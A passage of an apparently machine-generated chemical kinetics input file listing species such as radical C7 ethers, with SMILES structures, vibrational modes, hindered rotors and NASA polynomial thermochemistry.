NASA(polynomials=[NASAPolynomial(coeffs=[3.65718,0.0021266,5.45839e-06,-6.6181e-09,2.46571e-12,16422.7,1.67354], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.97812,0.00579785,-1.97558e-06,3.07298e-10,-1.79174e-14,16509.5,4.72248], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(136.188,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(83.1447,'J/(mol*K)'), label="""CH3""", comment="""Thermo library: FFCM1(-)"""), ) species( label = 'C=CC=CO[CH]C(3814)', structure = SMILES('C=CC=CO[CH]C'), E0 = (60.1923,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,3025,407.5,1350,352.5,2950,3100,1380,975,1025,1650,2995,3010,3025,975,987.5,1000,1300,1337.5,1375,400,450,500,1630,1655,1680,180,180,180,180],'cm^-1')), HinderedRotor(inertia=(0.965138,'amu*angstrom^2'), symmetry=1, barrier=(22.1904,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.963416,'amu*angstrom^2'), symmetry=1, barrier=(22.1508,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.965386,'amu*angstrom^2'), symmetry=1, barrier=(22.1961,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.963081,'amu*angstrom^2'), symmetry=1, barrier=(22.1431,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 2, opticalIsomers = 1, molecularWeight = (97.1351,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.112572,0.0714945,-2.17543e-05,-4.20115e-08,2.68296e-11,7405.09,25.5545], Tmin=(100,'K'), Tmax=(925.225,'K')), NASAPolynomial(coeffs=[25.6278,0.00928354,-4.52553e-07,-3.63748e-11,-1.3952e-15,541.59,-107.978], Tmin=(925.225,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(60.1923,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(365.837,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-Cs(Cds-Cd)) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cds-Cds(Cds-Cds)H) + group(Cds-Cds(Cds-Cds)H) + 
group(Cds-CdsOsH) + group(Cds-CdsHH) + radical(CCsJOC(O))"""), ) species( label = 'C=CC[C](C)O[CH]C(3815)', structure = SMILES('C=CC[C](C)O[CH]C'), E0 = (133.678,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,2950,3100,1380,975,1025,1650,360,370,350,2750,2850,1437.5,1250,1305,750,350,3010,987.5,1337.5,450,1655,200,800,1066.67,1333.33,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.19918,0.0981604,-0.000109576,7.3549e-08,-2.08823e-11,16223.7,32.3302], Tmin=(100,'K'), Tmax=(842.758,'K')), NASAPolynomial(coeffs=[10.1903,0.0488487,-2.18079e-05,4.1198e-09,-2.86482e-13,14472.6,-16.0157], Tmin=(842.758,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(133.678,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + longDistanceInteraction_noncyclic(OsCs-ST) + group(Cs-CsCsOsH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(C2CsJOCs) + 
radical(CCsJOCs)"""), ) species( label = '[CH2]COC(C)[CH]C=C(3816)', structure = SMILES('[CH2]COC(C)[CH]C=C'), E0 = (101.023,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,3010,987.5,1337.5,450,1655,2950,3100,1380,975,1025,1650,1380,1390,370,380,2900,435,3000,3100,440,815,1455,1000,2750,2800,2850,1350,1500,750,1050,1375,1000,2750,2850,1437.5,1250,1305,750,350,200,800,1066.67,1333.33,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.328941,0.0916726,-7.53041e-05,3.24753e-08,-5.75653e-12,12308.9,31.2194], Tmin=(100,'K'), Tmax=(1321.64,'K')), NASAPolynomial(coeffs=[16.5572,0.0405664,-1.73013e-05,3.21747e-09,-2.22172e-13,7845.37,-54.9554], Tmin=(1321.64,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(101.023,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + longDistanceInteraction_noncyclic(OsCs-ST) + group(Cs-CsCsOsH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(C=CCJCO) + radical(CJCO)"""), ) species( label = 
'C=[C]CC(C)O[CH]C(3817)', structure = SMILES('C=[C]CC(C)O[CH]C'), E0 = (190.815,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,1685,370,2950,3100,1380,975,1025,1650,1380,1390,370,380,2900,435,2750,2850,1437.5,1250,1305,750,350,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1066.67,1333.33,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.116875,0.0920235,-8.42613e-05,4.28703e-08,-9.11656e-12,23096.8,32.5505], Tmin=(100,'K'), Tmax=(1108.61,'K')), NASAPolynomial(coeffs=[13.2829,0.0436758,-1.88451e-05,3.53229e-09,-2.45596e-13,20125.8,-33.4773], Tmin=(1108.61,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(190.815,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + longDistanceInteraction_noncyclic(OsCs-ST) + group(Cs-CsCsOsH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(CCsJOCs) + radical(Cds_S)"""), ) species( label = 'C=C[CH][C](C)OCC(3818)', structure = 
SMILES('[CH2][CH]C=C(C)OCC'), E0 = (60.3895,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.241916,0.0805121,-4.48186e-05,1.20008e-09,5.07182e-12,7426.86,32.0078], Tmin=(100,'K'), Tmax=(1057.2,'K')), NASAPolynomial(coeffs=[17.8313,0.0354302,-1.39126e-05,2.55712e-09,-1.78652e-13,2303.4,-62.3483], Tmin=(1057.2,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(60.3895,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-Cs(Cds-Cd)) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsOs) + group(Cds-CdsCsH) + radical(Allyl_S) + radical(RCCJ)"""), ) species( label = '[CH2]C(CC=C)O[CH]C(3819)', structure = SMILES('[CH2]C(CC=C)O[CH]C'), E0 = (163.484,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,3010,987.5,1337.5,450,1655,2950,3100,1380,975,1025,1650,1380,1390,370,380,2900,435,3000,3100,440,815,1455,1000,2750,2800,2850,1350,1500,750,1050,1375,1000,2750,2850,1437.5,1250,1305,750,350,200,800,1066.67,1333.33,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, 
opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.476514,0.100614,-0.000104239,5.97469e-08,-1.40617e-11,19822,33.124], Tmin=(100,'K'), Tmax=(1019.28,'K')), NASAPolynomial(coeffs=[14.4489,0.0420412,-1.80417e-05,3.36892e-09,-2.33728e-13,16779.4,-39.1673], Tmin=(1019.28,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(163.484,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + longDistanceInteraction_noncyclic(OsCs-ST) + group(Cs-CsCsOsH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(CCsJOCs) + radical(CJC(C)OC)"""), ) species( label = '[CH]=CCC(C)O[CH]C(3820)', structure = SMILES('[CH]=CCC(C)O[CH]C'), E0 = (200.07,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.310273,0.0928,-8.28024e-05,3.97954e-08,-7.8573e-12,24219.7,33.1694], Tmin=(100,'K'), Tmax=(1200.49,'K')), NASAPolynomial(coeffs=[15.5654,0.0399021,-1.6706e-05,3.08966e-09,-2.13273e-13,20408,-46.322], Tmin=(1200.49,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(200.07,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + longDistanceInteraction_noncyclic(OsCs-ST) + group(Cs-CsCsOsH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Cds_P) + radical(CCsJOCs)"""), ) species( label = '[CH2]C=CC([CH2])OCC(3772)', structure = SMILES('[CH2]C([CH]C=C)OCC'), E0 = (99.9445,'kJ/mol'), modes = [ 
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,3010,987.5,1337.5,450,1655,2950,3100,1380,975,1025,1650,1380,1390,370,380,2900,435,3000,3100,440,815,1455,1000,2750,2800,2850,1350,1500,750,1050,1375,1000,2750,2850,1437.5,1250,1305,750,350,200,800,1066.67,1333.33,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.298874,0.0964724,-8.91655e-05,4.51931e-08,-9.54898e-12,12173.7,30.2367], Tmin=(100,'K'), Tmax=(1115.57,'K')), NASAPolynomial(coeffs=[14.0838,0.0449018,-1.98234e-05,3.75425e-09,-2.62508e-13,8964.76,-40.7243], Tmin=(1115.57,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(99.9445,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + longDistanceInteraction_noncyclic(OsCs-ST) + group(Cs-CsCsOsH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(C=CCJCO) + radical(CJC(C)OC)"""), ) species( label = '[CH2][CH]OC(C)CC=C(3821)', structure = SMILES('[CH2][CH]OC(C)CC=C'), E0 = (164.563,'kJ/mol'), modes = [ 
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,3010,987.5,1337.5,450,1655,2950,3100,1380,975,1025,1650,1380,1390,370,380,2900,435,2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,3000,3100,440,815,1455,1000,200,800,1066.67,1333.33,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.406804,0.094678,-8.66438e-05,4.25818e-08,-8.55409e-12,19952.9,33.7467], Tmin=(100,'K'), Tmax=(1185.45,'K')), NASAPolynomial(coeffs=[16.0774,0.0390565,-1.62638e-05,3.00204e-09,-2.07117e-13,16044.6,-48.5844], Tmin=(1185.45,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(164.563,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + longDistanceInteraction_noncyclic(OsCs-ST) + group(Cs-CsCsOsH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(CJCO) + radical(CCsJOCs)"""), ) species( label = 'C=[C][CH]C(C)OCC(3822)', structure = SMILES('C=[C][CH]C(C)OCC'), E0 = (127.276,'kJ/mol'), modes = [ 
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,1685,370,2950,3100,1380,975,1025,1650,1380,1390,370,380,2900,435,2750,2850,1437.5,1250,1305,750,350,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1066.67,1333.33,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.0212198,0.0883855,-7.10432e-05,3.07396e-08,-5.60672e-12,15450,29.8016], Tmin=(100,'K'), Tmax=(1261.27,'K')), NASAPolynomial(coeffs=[13.5439,0.0454995,-2.00399e-05,3.78083e-09,-2.63145e-13,12038.9,-38.5764], Tmin=(1261.27,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(127.276,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + longDistanceInteraction_noncyclic(OsCs-ST) + group(Cs-CsCsOsH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(C=CCJCO) + radical(Cds_S)"""), ) species( label = '[CH]=C[CH]C(C)OCC(3823)', structure = SMILES('[CH]C=CC(C)OCC'), E0 = (128.528,'kJ/mol'), modes = [ 
HarmonicOscillator(frequencies=([1380,1390,370,380,2900,435,2750,2850,1437.5,1250,1305,750,350,2995,3025,975,1000,1300,1375,400,500,1630,1680,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,960,1120,1280,1440,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.277184,0.0839529,-5.35869e-05,1.70314e-08,-2.20242e-12,15620.6,34.8068], Tmin=(100,'K'), Tmax=(1761.18,'K')), NASAPolynomial(coeffs=[19.1277,0.0398808,-1.60509e-05,2.82284e-09,-1.85533e-13,8785.4,-69.7938], Tmin=(1761.18,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(128.528,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsH) + group(Cds-CdsCsH) + radical(AllylJ2_triplet)"""), ) species( label = 'C[CH][O](2420)', structure = SMILES('C[CH][O]'), E0 = (157.6,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,3025,407.5,1350,352.5,1642.51],'cm^-1')), 
HinderedRotor(inertia=(0.123965,'amu*angstrom^2'), symmetry=1, barrier=(2.85019,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (44.0526,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.65562,0.0114444,2.34936e-06,-4.83164e-09,1.17966e-12,18963.9,10.3625], Tmin=(100,'K'), Tmax=(1718.65,'K')), NASAPolynomial(coeffs=[6.06294,0.0136322,-6.35953e-06,1.18407e-09,-7.90642e-14,16985.9,-5.90233], Tmin=(1718.65,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(157.6,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(199.547,'J/(mol*K)'), comment="""Thermo library: FFCM1(-) + radical(CCsJOH) + radical(CCOJ)"""), ) species( label = 'C[CH]OC(C)C1[CH]C1(3824)', structure = SMILES('C[CH]OC(C)C1[CH]C1'), E0 = (204.659,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.0842848,0.077934,-4.33036e-05,3.40071e-09,3.49607e-12,24771.9,33.105], Tmin=(100,'K'), Tmax=(1090.26,'K')), NASAPolynomial(coeffs=[16.4392,0.0372404,-1.47348e-05,2.69719e-09,-1.87009e-13,19984.5,-53.4712], Tmin=(1090.26,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(204.659,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + longDistanceInteraction_noncyclic(OsCs-ST) + group(Cs-CsCsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + ring(Cyclopropane) + radical(cyclopropane) + radical(CCsJOCs)"""), ) species( label = 'CC1[CH][CH]CC(C)O1(3825)', structure = SMILES('CC1[CH][CH]CC(C)O1'), E0 = (77.3515,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = 
SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.30204,0.0422985,5.4693e-05,-9.69592e-08,4.02792e-11,9416.05,26.6635], Tmin=(100,'K'), Tmax=(925.907,'K')), NASAPolynomial(coeffs=[11.84,0.0402369,-1.23789e-05,2.03102e-09,-1.37274e-13,5601.57,-33.4253], Tmin=(925.907,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(77.3515,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(473.925,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-CsCsOsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + ring(Oxane) + radical(RCCJCC) + radical(CCJCO)"""), ) species( label = 'C=CC=C(C)OCC(3826)', structure = SMILES('C=CC=C(C)OCC'), E0 = (-175.527,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.399998,0.0811753,-3.54254e-05,-1.76681e-08,1.41407e-11,-20938.6,29.1159], Tmin=(100,'K'), Tmax=(981.346,'K')), NASAPolynomial(coeffs=[20.8197,0.0297981,-1.05685e-05,1.90842e-09,-1.35414e-13,-26794.3,-81.4725], Tmin=(981.346,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-175.527,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-Cs(Cds-Cd)) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsOs) + group(Cds-Cds(Cds-Cds)H) + group(Cds-Cds(Cds-Cds)H) + group(Cds-CdsHH)"""), ) species( label = 'C=CCC(C)OC=C(3827)', structure = SMILES('C=CCC(C)OC=C'), E0 = (-141.708,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = 
